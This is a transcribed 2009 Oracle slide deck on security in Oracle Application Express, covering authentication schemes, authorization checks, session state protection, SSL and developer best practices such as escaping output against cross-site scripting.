Transcript Security
<Insert Picture Here>
Oracle Application Express
Security
Authentication
• Out-of-the-Box Pre-Configured Schemes
•
•
•
•
•
•
LDAP Directory credentials
Oracle Application Server Single-Sign On
Open door credentials
Application Express accounts
Database Account credentials
No Authentication (using DAD)
• Custom Authentication
• Customizable session management logic
• Use or modify (session verification function) built-in page sentry
• Develop custom sentry (examples provided)
• Credentials verification custom PL/SQL
• Accepts user name and password; Returns Boolean
• Only executed once per session
© 2009 Oracle Corporation
Managing User Access
• Authorization
• Pass / Fail checks – cached to improve performance
• Can associate to any component (e.g. Application, page, button,
validation, item, etc.)
• Various types (e.g. Exists, SQL Query, PL/SQL Function, etc.)
• Session State Protection
• Prevent URL Tampering
• Utilizes MD5 checksum
• Agnostically use Database Security Features
• Fine Grained Access Control (aka VPD); Transparent Data
Encryption; Database Vault; Advanced Security Option; etc.
• No APEX development effort required
© 2009 Oracle Corporation
Administrator Best Practices
• Considerations with Embedded PL/SQL Gateway
• Uses XMLDB HTTP Protocol Listener – Part of the Database
• Not recommended for internet facing applications
• Configuring Oracle HTTP Server with mod_plsql
• Configured using Database Access Descriptors (DADs)
• Use PlsqlRequestValidationFunction to allow specified procedures
• Utilizing Secure Sockets Layer (SSL)
• Implemented using the HTTPS protocol – encrypts sent / received packets
• Prevents data from being sent over unprotected communication channel
• APEX Runtime-Only Environment
• Scripts provided to completely remove / re-install Application Builder
• Removes Web interface for administration and application development
• Setting Password Complexity Rules
• Can set multiple complexity rules / re-use rules across instance
• Using Session Timeout
• Set maximum session length and idle time for APEX developer log-ins
© 2009 Oracle Corporation
Developer Best Practices
• Understand Items of type Password
• Don’t emit entered text to screen
• Should not save-state or should use Item encryption if saving to the DB
• Reports provided to identify at-risk Password items
• Using Zero as Session ID
• Critical for PUBLIC applications to ensure no cross-user contamination
• Session Id not included in application URL
• Cross-Site Scripting Protection
• Protect HTML Regions and other static areas
• Use &ITEM. notation to reference session state variables
• Select best Item types based on protection required
• Protect Dynamic Output
• Explicitly use escape code when emitting session state
{e.g. htp.p(htf.escape_sc(v('SOME_ITEM'))); }
• Protect Report Regions
• References in headings and messages escaped based on Item type
© 2009 Oracle Corporation
Developer Best Practices
• Session State Protection
• Clear session state of unneeded values using Clear Cache built-ins
• Enable Session State Protection to prevent URL tampering
• Set appropriate protection for Pages, Items and Application Items using built-ins
• Utilize Application Session Time-Outs
• Build public page for users to land on when session expired
• Set Maximum Session Length and Maximum Session Idle times
• Save State before Branching
• Use Branch checkbox to save session state values prior to branching
• Session state values will not be displayed in the Branch URL
• Saving sensitive Item values (e.g. SSN)
• Use Item checkbox to store value encrypted in session state
• Stores values encrypted in APEX session state table
• For storing sensitive data in the database should encrypt the table columns
• Encrypting table columns completely independent of APEX
© 2009 Oracle Corporation